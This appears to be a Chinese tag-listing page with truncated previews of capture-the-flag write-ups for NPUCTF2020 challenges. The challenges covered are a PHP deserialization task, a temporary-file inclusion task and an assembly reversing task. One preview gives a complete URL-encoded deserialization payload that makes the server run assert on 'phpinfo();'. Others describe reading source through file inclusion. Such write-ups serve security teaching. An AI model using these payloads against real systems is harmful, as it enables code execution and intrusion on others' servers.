首页 > TAG信息列表 > NPUCTF2020
[NPUCTF2020]ReadlezPHP 1
打开源代码发现了个./time.php?source 于是打开点进去 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public[NPUCTF2020]ReadlezPHP
[NPUCTF2020]ReadlezPHP 1.先查看源码,得到地址 2. 2.得到一个源码,一看应该就是反序列化题 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s";[NPUCTF2020]ReadlezPHP
[NPUCTF2020]ReadlezPHP WriteUp 知识点 反序列化 可变函数 题解 很简单,直接上最后的payload。 ?data=O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D 没有编码是: O:8:"HelloPhp":2:{s[NPUCTF2020]ezinclude
[NPUCTF2020]ezinclude 知识点: 临时文件包含 解题: 话不多说,GET一个pass=Hash的值,得到提示flflflflag.php,一个文件包含:include($_GET["file"]) 读源码: <html> <head> <script language="javascript" type="text/javascript"> window.locatio第五十九题——[NPUCTF2020]ReadlezPHP
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,按f12查看源码,看到一个跳转提示:/time.php?source 第二步:查看time.php界面,发现源代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){[NPUCTF2020]ezinclude
WP 进入环境,说用户名或者密码错误。抓包看一下,疑似哈希长度拓展攻击: 但是长度不知道,爆破的可能性不大,想了一下突然想起来给了hash值了,我还想着去长度拓展攻击呢,所以直接pass传一下: 进入flflflflag.php,发现是个文件包含。 include($_GET["file"]) 伪协议读一下源码: <html>re | [NPUCTF2020]BasicASM
这个题很神奇,给了一个.s文件和一个txt文件。 打开一看,txt文件是输出,.s文件是汇编代码,x86-64的汇编,完全不难,大概看看就知道干了些啥了,这里贴出分析: 1 00007FF7A8AC5A50 push rbp 2 00007FF7A8AC5A52 push rdi 3 00007FF7A8AC5A53 sub rsp,238h